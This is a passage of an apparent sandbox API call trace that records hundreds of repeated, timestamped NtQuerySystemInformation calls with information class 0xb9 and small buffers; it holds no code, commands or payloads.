ResultLength=0x0) [0209.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.625] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f460, Length=0x40, ResultLength=0x0) [0209.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f460, Length=0x40, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x38, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2a0, Length=0x38, ResultLength=0x0) [0209.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.668] NtQuerySystemInformation 